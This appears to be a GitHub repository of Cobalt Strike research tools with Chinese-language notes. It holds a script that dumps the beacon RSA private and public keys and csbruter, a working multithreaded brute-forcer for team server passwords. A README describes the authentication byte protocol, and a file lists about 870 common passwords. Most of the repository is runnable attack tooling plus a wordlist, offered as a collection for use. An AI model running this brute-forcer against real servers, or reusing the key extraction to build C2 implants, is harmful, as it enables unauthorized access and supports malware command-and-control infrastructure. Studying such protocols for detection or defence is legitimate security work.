├── requirements.txt ├── .cobaltstrike.beacon_keys ├── README.md ├── parse_beacon_keys.py ├── csbruter ├── README.md ├── csbruter.py └── dict.txt └── .gitignore /requirements.txt: -------------------------------------------------------------------------------- 1 | javaobj-py3 -------------------------------------------------------------------------------- /.cobaltstrike.beacon_keys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Slzdude/cs-scripts/HEAD/.cobaltstrike.beacon_keys -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## CS Scripts 2 | 3 | 研究CobaltStrike时的一些副产品 4 | 5 | ### parse_beacon_keys.py 6 | 7 | `.cobaltstrike.beacon_keys`中存储了CS通信时用来加密的RSA公私钥,所以如CrossC2, 8 | geacon等c2都需要解析这个文件,CrossC2怎么弄得我不知道,但是找了找,网上基本都是用 9 | Java进行解析 10 | 11 | 这个文件本身其实就是一个KeyPair的Java对象,Python的`javaobj-py3`库可以直接读取里面存储的数据。 12 | 13 | 主要好处是无视serialVersionUID导致的版本兼容性问题,同时Python的启动速度较Java较快 14 | 15 | ### csbruter 16 | 17 | 来源:https://github.com/ryanohoro/csbruter 18 | 19 | 暴力破解Cobalt Strike团队服务器密码的脚本。 20 | 21 | 由于Cobalt Strike 3.10(于2017年12月11日发布)在尝试之间施加了1秒的延迟,以缓解 22 | 此攻击,目前爆破的效果不是很好。 23 | 24 | 此处仅做收集,后续有需要可以考虑用Golang重构或者优化爆破脚本 25 | -------------------------------------------------------------------------------- /parse_beacon_keys.py: -------------------------------------------------------------------------------- 1 | import base64 2 | 3 | import javaobj.v2 as javaobj 4 | 5 | with open(".cobaltstrike.beacon_keys", "rb") as fd: 6 | pobj = javaobj.load(fd) 7 | privateKey = pobj.array.value.privateKey.encoded.data 8 | publicKey = pobj.array.value.publicKey.encoded.data 9 | 10 | 11 | privateKey = ( 12 | b"-----BEGIN PRIVATE KEY-----\n" 13 | + base64.encodebytes(bytes(map(lambda x: x & 0xFF, privateKey))) 14 | + b"-----END PRIVATE KEY-----" 15 | ) 16 | publicKey = ( 17 | b"-----BEGIN PUBLIC KEY-----\n" 18 | + base64.encodebytes(bytes(map(lambda x: x & 0xFF, publicKey))) 19 | + b"-----END PUBLIC KEY-----" 20 | ) 21 | print(privateKey.decode()) 22 | print(publicKey.decode()) 23 | 24 | # print( 25 | # list( 26 | # map( 27 | # lambda x: list(map(lambda y: (y[0].name, y[1]), x.items())), 28 | # a.field_data.values(), 29 | # ) 30 | # ) 31 | # ) 32 | -------------------------------------------------------------------------------- /csbruter/README.md: -------------------------------------------------------------------------------- 1 | # csbruter.py 2 | 3 | Script to brute force Cobalt Strike team server passwords. 4 | 5 | ## Usage 6 | 7 | ``` 8 | python3 csbruter.py [-h] [-p PORT] [-t THREADS] host [wordlist] 9 | ``` 10 | 11 | Default port is 50050. Wordlist can be supplied via stdin as such: 12 | 13 | ``` 14 | cat wordlist.txt | python3 csbruter.py 192.168.1.1 15 | ``` 16 | 17 | Tested at up to 138 attempts per second. 18 | 19 | ## Issue 20 | 21 | Cobalt Strike team server has no mitigation for password brute force 22 | attacks. 23 | 24 | ### Mitigation Update 25 | 26 | Cobalt Strike 3.10 (Released Dec 11, 2017) imposes a 1 second delay between attempts as a mitigation for this attack. 27 | 28 | ## Background 29 | 30 | The Cobalt Strike team server requires two types of authentication. The 31 | first is a raw data type of authentication ostensibly used to protect 32 | the socket. The second is a Java serialized object based authentication 33 | which includes the mostly symbolic user name. This script attempts to 34 | brute force the former authentication type, which includes no rate 35 | limiting or account lockout mechanism. 36 | 37 | Both of these authentication types are wrapped in an SSL socket, with 38 | a certificate containing following subject: 39 | 40 | ``` 41 | /C=Earth/ST=Cyberspace/L=Somewhere/O=cobaltstrike/OU=AdvancedPenTesting/CN=Major Cobalt Strike 42 | ``` 43 | 44 | This certificate is baked into the Cobalt Strike Java Keystore 45 | cobaltstrike.store, which is easier to change if you use one of the 46 | default keystore passwords: 123456 47 | 48 | The first authentication request is defined roughly as such in a fixed 49 | 261 byte length command: 50 | 51 | ``` 52 | 4 Byte Magic \x00\x00\xBE\xEF 53 | 1 Byte Password Length (unsigned int) 54 | Password (unsigned int cast char array) 55 | Padding \x65 "A" * ( Length( Password ) - 256 ) 56 | ``` 57 | 58 | Which, on the wire, looks roughly like this, however the padding is 59 | ignored and can be anything. The authentication routine will read up to 60 | 256 of Length. 61 | 62 | ``` 63 | \x00\x00\xBE\xEF\x08passwordAAAAAAAAAAAAAA...AAAA 64 | ``` 65 | 66 | If the password supplied matches the password defined when starting the 67 | team server, the team server replies with a 4 byte magic. This password 68 | can not be empty (zero length). 69 | 70 | ``` 71 | \x00\x00\xCA\xFE 72 | ``` 73 | 74 | Otherwise, the team server returns null 75 | 76 | ``` 77 | \x00\x00\x00\x00 78 | ``` 79 | 80 | Once this phase is completed successfully, the team server expects a 81 | serialized object class called Request. 82 | 83 | On the team server, the following log entries are sent to stdout during 84 | brute force authentication. 85 | 86 | Invalid password: 87 | ``` 88 | [-] rejected client from 192.168.1.1: invalid password 89 | ``` 90 | 91 | Valid password: 92 | ``` 93 | [!] Trapped java.io.EOFException during client (192.168.1.1) read [Manage: unauth'd user]: null 94 | ``` 95 | 96 | An error is thrown because the socket is closed immediately after an 97 | attempt. -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.toptal.com/developers/gitignore/api/pycharm+all,python 3 | # Edit at https://www.toptal.com/developers/gitignore?templates=pycharm+all,python 4 | 5 | ### PyCharm+all ### 6 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider 7 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 8 | 9 | # User-specific stuff 10 | .idea/**/workspace.xml 11 | .idea/**/tasks.xml 12 | .idea/**/usage.statistics.xml 13 | .idea/**/dictionaries 14 | .idea/**/shelf 15 | 16 | # Generated files 17 | .idea/**/contentModel.xml 18 | 19 | # Sensitive or high-churn files 20 | .idea/**/dataSources/ 21 | .idea/**/dataSources.ids 22 | .idea/**/dataSources.local.xml 23 | .idea/**/sqlDataSources.xml 24 | .idea/**/dynamic.xml 25 | .idea/**/uiDesigner.xml 26 | .idea/**/dbnavigator.xml 27 | 28 | # Gradle 29 | .idea/**/gradle.xml 30 | .idea/**/libraries 31 | 32 | # Gradle and Maven with auto-import 33 | # When using Gradle or Maven with auto-import, you should exclude module files, 34 | # since they will be recreated, and may cause churn. Uncomment if using 35 | # auto-import. 36 | # .idea/artifacts 37 | # .idea/compiler.xml 38 | # .idea/jarRepositories.xml 39 | # .idea/modules.xml 40 | # .idea/*.iml 41 | # .idea/modules 42 | # *.iml 43 | # *.ipr 44 | 45 | # CMake 46 | cmake-build-*/ 47 | 48 | # Mongo Explorer plugin 49 | .idea/**/mongoSettings.xml 50 | 51 | # File-based project format 52 | *.iws 53 | 54 | # IntelliJ 55 | out/ 56 | 57 | # mpeltonen/sbt-idea plugin 58 | .idea_modules/ 59 | 60 | # JIRA plugin 61 | atlassian-ide-plugin.xml 62 | 63 | # Cursive Clojure plugin 64 | .idea/replstate.xml 65 | 66 | # Crashlytics plugin (for Android Studio and IntelliJ) 67 | com_crashlytics_export_strings.xml 68 | crashlytics.properties 69 | crashlytics-build.properties 70 | fabric.properties 71 | 72 | # Editor-based Rest Client 73 | .idea/httpRequests 74 | 75 | # Android studio 3.1+ serialized cache file 76 | .idea/caches/build_file_checksums.ser 77 | 78 | ### PyCharm+all Patch ### 79 | # Ignores the whole .idea folder and all .iml files 80 | # See https://github.com/joeblau/gitignore.io/issues/186 and https://github.com/joeblau/gitignore.io/issues/360 81 | 82 | .idea/ 83 | 84 | # Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-249601023 85 | 86 | *.iml 87 | modules.xml 88 | .idea/misc.xml 89 | *.ipr 90 | 91 | # Sonarlint plugin 92 | .idea/sonarlint 93 | 94 | ### Python ### 95 | # Byte-compiled / optimized / DLL files 96 | __pycache__/ 97 | *.py[cod] 98 | *$py.class 99 | 100 | # C extensions 101 | *.so 102 | 103 | # Distribution / packaging 104 | .Python 105 | build/ 106 | develop-eggs/ 107 | dist/ 108 | downloads/ 109 | eggs/ 110 | .eggs/ 111 | parts/ 112 | sdist/ 113 | var/ 114 | wheels/ 115 | pip-wheel-metadata/ 116 | share/python-wheels/ 117 | *.egg-info/ 118 | .installed.cfg 119 | *.egg 120 | MANIFEST 121 | 122 | # PyInstaller 123 | # Usually these files are written by a python script from a template 124 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 125 | *.manifest 126 | *.spec 127 | 128 | # Installer logs 129 | pip-log.txt 130 | pip-delete-this-directory.txt 131 | 132 | # Unit test / coverage reports 133 | htmlcov/ 134 | .tox/ 135 | .nox/ 136 | .coverage 137 | .coverage.* 138 | .cache 139 | nosetests.xml 140 | coverage.xml 141 | *.cover 142 | *.py,cover 143 | .hypothesis/ 144 | .pytest_cache/ 145 | pytestdebug.log 146 | 147 | # Translations 148 | *.mo 149 | *.pot 150 | 151 | # Django stuff: 152 | *.log 153 | local_settings.py 154 | db.sqlite3 155 | db.sqlite3-journal 156 | 157 | # Flask stuff: 158 | instance/ 159 | .webassets-cache 160 | 161 | # Scrapy stuff: 162 | .scrapy 163 | 164 | # Sphinx documentation 165 | docs/_build/ 166 | doc/_build/ 167 | 168 | # PyBuilder 169 | target/ 170 | 171 | # Jupyter Notebook 172 | .ipynb_checkpoints 173 | 174 | # IPython 175 | profile_default/ 176 | ipython_config.py 177 | 178 | # pyenv 179 | .python-version 180 | 181 | # pipenv 182 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 183 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 184 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 185 | # install all needed dependencies. 186 | #Pipfile.lock 187 | 188 | # poetry 189 | #poetry.lock 190 | 191 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 192 | __pypackages__/ 193 | 194 | # Celery stuff 195 | celerybeat-schedule 196 | celerybeat.pid 197 | 198 | # SageMath parsed files 199 | *.sage.py 200 | 201 | # Environments 202 | # .env 203 | .env/ 204 | .venv/ 205 | env/ 206 | venv/ 207 | ENV/ 208 | env.bak/ 209 | venv.bak/ 210 | pythonenv* 211 | 212 | # Spyder project settings 213 | .spyderproject 214 | .spyproject 215 | 216 | # Rope project settings 217 | .ropeproject 218 | 219 | # mkdocs documentation 220 | /site 221 | 222 | # mypy 223 | .mypy_cache/ 224 | .dmypy.json 225 | dmypy.json 226 | 227 | # Pyre type checker 228 | .pyre/ 229 | 230 | # pytype static type analyzer 231 | .pytype/ 232 | 233 | # operating system-related files 234 | *.DS_Store #file properties cache/storage on macOS 235 | Thumbs.db #thumbnail cache on Windows 236 | 237 | # profiling data 238 | .prof 239 | 240 | 241 | # End of https://www.toptal.com/developers/gitignore/api/pycharm+all,python -------------------------------------------------------------------------------- /csbruter/csbruter.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import ssl 4 | import argparse 5 | import concurrent.futures 6 | import sys 7 | 8 | # csbrute.py - Cobalt Strike Team Server Password Brute Forcer 9 | 10 | # https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versi 11 | 12 | MIN_PYTHON = (3, 3) 13 | if sys.version_info < MIN_PYTHON: 14 | sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON) 15 | 16 | parser = argparse.ArgumentParser() 17 | 18 | parser.add_argument("host", help="Teamserver address") 19 | parser.add_argument("wordlist", nargs="?", help="Newline-delimited word list file") 20 | parser.add_argument("-p", dest="port", default=50050, type=int, help="Teamserver port") 21 | parser.add_argument( 22 | "-t", dest="threads", default=25, type=int, help="Concurrency level" 23 | ) 24 | 25 | args = parser.parse_args() 26 | 27 | # https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socket 28 | 29 | 30 | class NotConnectedException(Exception): 31 | def __init__(self, message=None, node=None): 32 | self.message = message 33 | self.node = node 34 | 35 | 36 | class DisconnectedException(Exception): 37 | def __init__(self, message=None, node=None): 38 | self.message = message 39 | self.node = node 40 | 41 | 42 | class Connector: 43 | def __init__(self): 44 | self.sock = None 45 | self.ssl_sock = None 46 | self.ctx = ssl.SSLContext() 47 | self.ctx.verify_mode = ssl.CERT_NONE 48 | pass 49 | 50 | def is_connected(self): 51 | return self.sock and self.ssl_sock 52 | 53 | def open(self, hostname, port): 54 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 55 | self.sock.settimeout(10) 56 | self.ssl_sock = self.ctx.wrap_socket(self.sock) 57 | 58 | if hostname == socket.gethostname(): 59 | ipaddress = socket.gethostbyname_ex(hostname)[2][0] 60 | self.ssl_sock.connect((ipaddress, port)) 61 | else: 62 | self.ssl_sock.connect((hostname, port)) 63 | 64 | def close(self): 65 | if self.sock: 66 | self.sock.close() 67 | self.sock = None 68 | self.ssl_sock = None 69 | 70 | def send(self, buffer): 71 | if not self.ssl_sock: 72 | raise NotConnectedException("Not connected (SSL Socket is null)") 73 | self.ssl_sock.sendall(buffer) 74 | 75 | def receive(self): 76 | if not self.ssl_sock: 77 | raise NotConnectedException("Not connected (SSL Socket is null)") 78 | received_size = 0 79 | data_buffer = b"" 80 | 81 | while received_size < 4: 82 | data_in = self.ssl_sock.recv() 83 | data_buffer = data_buffer + data_in 84 | received_size += len(data_in) 85 | 86 | return data_buffer 87 | 88 | 89 | def pwd_chk(password): 90 | if len(password) > 0: 91 | result = None 92 | conn = Connector() 93 | conn.open(args.host, args.port) 94 | payload = ( 95 | bytearray(b"\x00\x00\xbe\xef") # Magic number 96 | + len(password).to_bytes(1, "big", signed=True) 97 | + bytes(bytes(password, "ascii").ljust(256, b"A")) 98 | ) 99 | conn.send(payload) 100 | if conn.is_connected(): 101 | result = conn.receive() 102 | if conn.is_connected(): 103 | conn.close() 104 | if result == bytearray(b"\x00\x00\xca\xfe"): 105 | return password 106 | else: 107 | return False 108 | else: 109 | print("Ignored blank password") 110 | 111 | 112 | passwords = [] 113 | 114 | if args.wordlist: 115 | print("Wordlist: {}".format(args.wordlist)) 116 | passwords = open(args.wordlist).read().split("\n") 117 | else: 118 | print("Wordlist: {}".format("stdin")) 119 | for line in sys.stdin: 120 | passwords.append(line.rstrip()) 121 | 122 | if len(passwords) > 0: 123 | 124 | print("Word Count: {}".format(len(passwords))) 125 | print("Threads: {}".format(args.threads)) 126 | 127 | start = time.time() 128 | 129 | # https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python 130 | 131 | attempts = 0 132 | failures = 0 133 | 134 | with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor: 135 | 136 | future_to_check = { 137 | executor.submit(pwd_chk, password): password for password in passwords 138 | } 139 | for future in concurrent.futures.as_completed(future_to_check): 140 | password = future_to_check[future] 141 | try: 142 | data = future.result() 143 | attempts = attempts + 1 144 | if data: 145 | print("Found Password: {}".format(password)) 146 | except Exception as exc: 147 | failures = failures + 1 148 | print("%r generated an exception: %s" % (password, exc)) 149 | 150 | print("Attempts: {}".format(attempts)) 151 | print("Failures: {}".format(failures)) 152 | finish = time.time() 153 | print("Seconds: {:.1f}".format(finish - start)) 154 | print( 155 | "Attempts per second: {:.1f}".format((failures + attempts) / (finish - start)) 156 | ) 157 | else: 158 | print("Password(s) required") 159 | -------------------------------------------------------------------------------- /csbruter/dict.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 123456789 3 | 111111 4 | root 5 | root123 6 | root123456 7 | 12345678 8 | 123123 9 | 5201314 10 | 000000 11 | 11111111 12 | a123456 13 | 123321 14 | 123123123 15 | 00000000 16 | 1314520 17 | 7758521 18 | 1234567 19 | 666666 20 | 123456a 21 | 1234567890 22 | woaini 23 | a123456789 24 | 888888 25 | 88888888 26 | 147258369 27 | qq123456 28 | 654321 29 | zxcvbnm 30 | woaini1314 31 | 112233 32 | 5211314 33 | 123456abc 34 | 520520 35 | aaaaaa 36 | 123654 37 | 987654321 38 | 123456789a 39 | 12345 40 | 7758258 41 | 100200 42 | 147258 43 | 111222 44 | abc123456 45 | 111222tianya 46 | 121212 47 | 1111111 48 | abc123 49 | 110110 50 | 789456 51 | q123456 52 | 123456aa 53 | aa123456 54 | asdasd 55 | 999999 56 | 123qwe 57 | 789456123 58 | 1111111111 59 | 1314521 60 | iloveyou 61 | qwerty 62 | password 63 | qazwsx 64 | 159357 65 | 222222 66 | woaini520 67 | woaini123 68 | 521521 69 | asd123 70 | qqqqqq 71 | qq1111 72 | 1234 73 | qwe123 74 | 111111111 75 | 1qaz2wsx 76 | qwertyuiop 77 | 5201314520 78 | asd123456 79 | 159753 80 | 31415926 81 | qweqwe 82 | 555555 83 | 333333 84 | woaini521 85 | abcd1234 86 | ASDFGHJKL 87 | 123456qq 88 | 11223344 89 | 456123 90 | 123000 91 | 123698745 92 | wangyut2 93 | 201314 94 | zxcvbnm123 95 | qazwsxedc 96 | 1q2w3e4r 97 | z123456 98 | 123abc 99 | a123123 100 | 12345678910 101 | asdfgh 102 | 456789 103 | qwe123456 104 | 321321 105 | 123654789 106 | 456852 107 | 0000000000 108 | WOAIWOJIA 109 | 741852963 110 | 5845201314 111 | aini1314 112 | 0123456789 113 | a321654 114 | 123456123 115 | 584520 116 | 778899 117 | 520520520 118 | 7777777 119 | q123456789 120 | 123789 121 | zzzzzz 122 | qweasdzxc 123 | 5845211314 124 | 123456q 125 | w123456 126 | 12301230 127 | qq123456789 128 | wocaonima 129 | qq123123 130 | a5201314 131 | a12345678 132 | asdasdasd 133 | a1234567 134 | 147852 135 | 110120 136 | 135792468 137 | CAONIMA 138 | 963852741 139 | 3.1415926 140 | 1234560 141 | 101010 142 | 7758520 143 | 753951 144 | 666888 145 | zxc123 146 | 0000000 147 | zhang123 148 | 987654 149 | a111111 150 | 1233211234567 151 | 789789 152 | 25257758 153 | 7708801314520 154 | zzzxxx 155 | 1111 156 | 999999999 157 | 1357924680 158 | yahoo.com.cn 159 | 123456789q 160 | 12341234 161 | 5841314520 162 | zxc123456 163 | yangyang 164 | 168168 165 | 123123qaz 166 | abcd123456 167 | 456456 168 | 963852 169 | as123456 170 | 741852 171 | xiaoxiao 172 | 1230123 173 | 555666 174 | 000000000 175 | 369369 176 | 211314 177 | 102030 178 | aaa123456 179 | zxcvbn 180 | 110110110 181 | buzhidao 182 | qaz123 183 | 123456. 184 | asdfasdf 185 | 123456789. 186 | woainima 187 | 123456ASD 188 | woshishui 189 | 131421 190 | 123321123 191 | dearbook 192 | 1234qwer 193 | qaz123456 194 | aaaaaaaa 195 | 111222333 196 | qq5201314 197 | 3344520 198 | 147852369 199 | 1q2w3e 200 | windows 201 | 123456987 202 | zz12369 203 | qweasd 204 | qiulaobai 205 | 66666666 206 | 12344321 207 | qwer1234 208 | a12345 209 | 7894561230 210 | qwqwqw 211 | 777777 212 | 110120119 213 | 951753 214 | wmsxie123 215 | 131420 216 | 1314520520 217 | 369258147 218 | 321321321 219 | 110119 220 | beijing2008 221 | 321654 222 | a000000 223 | 147896325 224 | 12121212 225 | 123456aaa 226 | 521521521 227 | 22222222 228 | 888999 229 | 123456789ABC 230 | abc123456789 231 | 12345678900 232 | 1q2w3e4r5t 233 | 1234554321 234 | www123456 235 | w123456789 236 | 336699 237 | abcdefg 238 | 709394 239 | 258369 240 | z123456789 241 | 314159 242 | 584521 243 | 12345678a 244 | 7788521 245 | 9876543210 246 | 258258 247 | 111111a 248 | 87654321 249 | 123asd 250 | 5201314a 251 | 134679 252 | 135246 253 | hotmail.com 254 | 123123a 255 | 11112222 256 | 131313 257 | 100200300 258 | 11111 259 | 1234567899 260 | 520530 261 | 251314 262 | qq66666 263 | yahoo.cn 264 | 123456qwe 265 | worinima 266 | sohu.com 267 | NULL 268 | 518518 269 | 123457 270 | q1w2e3r4 271 | 721521 272 | 123456789QQ 273 | 584131421 274 | qw123456 275 | 123456.. 276 | 0123456 277 | 135790 278 | 3344521 279 | 980099 280 | a1314520 281 | 123456123456 282 | qazwsx123 283 | asdf1234 284 | 444444 285 | 123456z 286 | 120120 287 | wang123456 288 | 12345600 289 | 7758521521 290 | 12369874 291 | abcd123 292 | a12369 293 | li123456 294 | 1234567891 295 | wang123 296 | 1234abcd 297 | 147369 298 | zhangwei 299 | qqqqqqqq 300 | 521125 301 | 010203 302 | 369258 303 | 654123 304 | woailaopo 305 | QAZQAZ 306 | 121314 307 | 1qazxsw2 308 | zxczxc 309 | l123456 310 | 111000 311 | jingjing 312 | 0000 313 | 1472583690 314 | 25251325 315 | langzi123 316 | wojiushiwo 317 | 7895123 318 | wangjian 319 | 123qweasd 320 | 110120130 321 | 1123581321 322 | 142536 323 | 584131420 324 | aaa123 325 | aaa111 326 | woaiwoziji 327 | 520123 328 | 665544 329 | ab123456 330 | a123456a 331 | fuckyou 332 | 99999999 333 | 5203344 334 | qwertyui 335 | 521314 336 | 18881888 337 | 584201314 338 | woaini@ 339 | 7654321 340 | 20082008 341 | 520131 342 | 124578 343 | 852456 344 | nihaoma 345 | 74108520 346 | 232323 347 | 55555555 348 | zx123456 349 | wwwwww 350 | 119119 351 | weiwei 352 | 13145200 353 | LOVE1314 354 | 564335 355 | 123456789123 356 | wo123456 357 | 123520 358 | 52013145201314 359 | loveyou 360 | wolf8637 361 | 112358 362 | 5201314123 363 | yuanyuan 364 | zhanglei 365 | zz123456 366 | 1234567A 367 | a11111 368 | 000000a 369 | 321654987 370 | xiaolong 371 | 5841314521 372 | shmily 373 | 520025 374 | 159951 375 | 77585210 376 | tiantian 377 | 134679852 378 | QWASZX 379 | 123456654321 380 | 20080808 381 | zhangjian 382 | 123465 383 | 9958123 384 | 159159 385 | 5508386 386 | wangwei 387 | 5205201314 388 | woaini5201314 389 | 888666 390 | 52013141314 391 | qweqweqwe 392 | 1122334455 393 | 123456789z 394 | 585858 395 | 33333333 396 | aa123123 397 | qwertyuiop123 398 | q111111 399 | 9638527410 400 | 911911 401 | qqq111 402 | 5213344 403 | sunshine 404 | liu123456 405 | abcdef 406 | zhendeaini 407 | 007007 408 | 555888 409 | qq111111 410 | jiushiaini 411 | mnbvcxz 412 | xiaoqiang 413 | 445566 414 | nicholas 415 | dongdong 416 | 123456abcd 417 | 111qqq 418 | aptx4869 419 | 258456 420 | wobuzhidao 421 | qazxsw 422 | 123789456 423 | zhang123456 424 | 7215217758991 425 | 1234567890123 426 | ...... 427 | huang123 428 | maomao 429 | 222333 430 | wangyang 431 | 123456789aa 432 | 1.23457E+11 433 | 1234566 434 | 1230456 435 | 1a2b3c4d 436 | 13141314 437 | a7758521 438 | 123456zxc 439 | 123456as 440 | forever 441 | s123456 442 | 12348765 443 | xxxxxx 444 | asdf123 445 | a1b2c3d4 446 | 246810 447 | 333666 448 | mingming 449 | 000123 450 | jiajia 451 | 12qwaszx 452 | ffffff 453 | 112233445566 454 | 77585211314 455 | 520131400 456 | aa123456789 457 | wpc000821 458 | WANGJING 459 | woaini1314520 460 |   461 | 000111 462 | qq1314520 463 | 1234512345 464 | 147147 465 | 123456qaz 466 | q123123 467 | 123456ab 468 | xiaofeng 469 | wodemima 470 | shanshan 471 | w2w2w2 472 | 666999 473 | 123456w 474 | 321456 475 | feifei 476 | dragon 477 | computer 478 | dddddd 479 | zhangjie 480 | baobao 481 | x123456 482 | q1w2e3 483 | chenchen 484 | 12345679 485 | 131452 486 | caonima123 487 | asdf123456 488 | tangkai 489 | 52013140 490 | longlong 491 | ssssss 492 | www123 493 | 1234568 494 | q1q1q1q1 495 | asdfghjkl123 496 | 14789632 497 | 123456711 498 | michael 499 | tingting 500 | woshishei 501 | asd123456789 502 | 1314258 503 | sunliu66 504 | qwert12345 505 | 235689 506 | 565656 507 | 1234569 508 | ww123456 509 | 1314159 510 | 5211314521 511 | 123456789w 512 | 123123aa 513 | 139.com@163.com 514 | 111111q 515 | hao123456 516 | 52tiance 517 | 19830122 518 | y123456 519 | 110119120 520 | 1231230 521 | sj811212 522 | 13579246810 523 | 123.123 524 | superman 525 | 789123 526 | 12345qwert 527 | 770880 528 | js77777 529 | zhangyang 530 | 686868 531 | @163.com 532 | imzzhan 533 | xiaoyu 534 | 7758521a 535 | abc12345 536 | nihao123 537 | wokaonima 538 | q11111 539 | 623623623 540 | 989898 541 | 122333 542 | 13800138000 543 | laopowoaini 544 | 787878 545 | 123456l 546 | a123123123 547 | 198611 548 | 332211 549 | tom.com 550 | 212121 551 | woaini123456 552 | wanglei 553 | yang123456 554 | zhangqiang 555 | zxcvbnm,./ 556 | zhangyan 557 | 181818 558 | 234567 559 | stryker 560 | 167669123 561 | laopo520 562 | 2597758 563 | aa5201314 564 | 139.com 565 | 5201314. 566 | 8888888888 567 | 74107410 568 | zhanghao 569 | 77777777 570 | zhangyu 571 | zzb19860526 572 | qwertyu 573 | 5201314qq 574 | 198612 575 | q5201314 576 | 999888 577 | 369852 578 | 121121 579 | 1122334 580 | 123456789asd 581 | 123zxc 582 | a123321 583 | QWErtyUIO 584 | 456456456 585 | qq000000 586 | m123456 587 | q1w2e3r4t5 588 | woainilaopo 589 | 123456789* 590 | 131425 591 | liuchang 592 | 85208520 593 | zhangjing 594 | c123456 595 | asdfghjk 596 | qq1234 597 | asdzxc 598 | hao123 599 | 777888 600 | 131131 601 | woainia 602 | beyond 603 | zhang520 604 | 556688 605 | 123456qw 606 | wangchao 607 | woshiniba 608 | 168888 609 | 7758991 610 | woshizhu 611 | ainiyiwannian 612 | LAOpo521 613 | abcd123456789 614 | qwerasdf 615 | 123456ok 616 | woshinidie 617 | huanhuan 618 | 1hxboqg2s 619 | meiyoumima 620 | 456321 621 | QQQ123456 622 | 1314 623 | 898989 624 | 123456798 625 | pp.com@163.com 626 | mm123456 627 | 123698741 628 | a520520 629 | z321321 630 | asasas 631 | YANG123 632 | 584211314 633 | 1234561 634 | 123456789+ 635 | miaomiao 636 | 789789789 637 | 7788520 638 | AAAAAAa 639 | h123456 640 | 3838438 641 | l123456789 642 | 198511 643 | ABCDEFG123 644 | zhangjun 645 | 123qaz 646 | 198512 647 | 2525775 648 | 54545454 649 | 789632145 650 | 831213 651 | 10101010 652 | xiaohe 653 | 19861010 654 | 10203 655 | woshishen 656 | 0987654321 657 | yj2009 658 | wangqiang 659 | 198411 660 | 1314520a 661 | xiaowei 662 | 123456000 663 | 123987 664 | love520 665 | caonimabi 666 | qwe123123 667 | 010101 668 | qq666666 669 | 789987 670 | 10161215 671 | liangliang 672 | qwert123 673 | 112112 674 | qianqian 675 | 1a2b3c 676 | 198410 677 | nuttertools 678 | goodluck 679 | zhangxin 680 | 18n28n24a5 681 | liuyang 682 | 998877 683 | woxiangni 684 | 7788250 685 | a147258369 686 | zhangliang 687 | 16897168 688 | 223344 689 | 123123456 690 | a1b2c3 691 | killer 692 | 321123 693 | pp.com 694 | chen123456 695 | wangpeng 696 | 753159 697 | 775852100 698 | 1478963 699 | 1213141516 700 | 369369369 701 | 1236987 702 | 123369 703 | 12345a 704 | bugaosuni 705 | 13145201314520 706 | 110112 707 | 123456... 708 | JIAOJIAO 709 | 100100 710 | 1314520123 711 | 19841010 712 | 7758521123 713 | shangxin 714 | woshiwo 715 | 12312300 716 | xingxing 717 | yingying 718 | 1233210 719 | 34416912 720 | qq12345 721 | qweasd123 722 | nishizhu 723 | 19861020 724 | qwe123456789 725 | 808080 726 | 1310613106 727 | 456789123 728 | 44444444 729 | 123123qq 730 | 3141592653 731 | 556677 732 | xx123456 733 | jianjian 734 | a1111111 735 | 0.123456 736 | 198610 737 | loveme 738 | tianshi 739 | woxihuanni 740 | 11235813 741 | 252525 742 | 225588 743 | lovelove 744 | mengmeng 745 | 7758258520 746 | xiaoming 747 | shanghai 748 | huyiming 749 | 6543210 750 | a7758258 751 | 7788414 752 | 123456789.. 753 | Jordan 754 | nishiwode 755 | ZHUZHU 756 | 1314woaini 757 | chenjian 758 | 131415 759 | xy123456 760 | 123456520 761 | a00000 762 | jiang123 763 | WOAIMAMA 764 | monkey 765 | 7418529630 766 | lingling 767 | 987456321 768 | w5201314 769 | qwer123456 770 | 198412 771 | asdasd123 772 | zzzzzzzz 773 | 1q1q1q 774 | 741741 775 | 987456 776 | 19851010 777 | 2587758 778 | 456654 779 | Iloveyou1314 780 | q12345 781 | imissyou 782 | daniel 783 | aipai 784 | 2222222 785 | 0147258369 786 | 123456789l 787 | q1234567 788 | 963963 789 | 123123123123 790 | 125521 791 | womendeai 792 | baobei520 793 | 19861015 794 | 667788 795 | 000000. 796 | zhangtao 797 | yy123456 798 | chen123 799 | nishishui 800 | 789654 801 | liu123 802 | 19861212 803 | 1230 804 | 19841020 805 | wangjun 806 | wangliang 807 | zhangpeng 808 | woainimama 809 | zhangchao 810 | 5201314q 811 | 19841025 812 | 123567 813 | aaaa1111 814 | 123456+ 815 | 134679258 816 | 668899 817 | 811009 818 | qaz123456789 819 | 123456789qwe 820 | 111112 821 | 130130 822 | 19861016 823 | wozhiaini 824 | 198712 825 | 123... 826 | abcde12345 827 | abcd12345 828 | wanggang 829 | llllll 830 | 5121314 831 | 456258 832 | 125125 833 | qq7758521 834 | 369963 835 | 987987 836 | 142857 837 | poiuytrewq 838 | qqq123 839 | 323232 840 | baobei 841 | g227w212 842 | 962464 843 | mylove 844 | p1a6s3m 845 | 202020 846 | 19491001 847 | 963258 848 | hhhhhh 849 | 2582587758 850 | wangfeng 851 | tiancai 852 | 11111111111 853 | summer 854 | wangwang 855 | asd123123 856 | 19841024 857 | xinxin 858 | 0.0.0. 859 | 19861012 860 | 19861210 861 | 8888888 862 | zhanghui 863 | wenwen 864 | 635241 865 | ASDFGHJ 866 | 19861023 867 | 1234567890. 868 | 888168 869 | 19861120 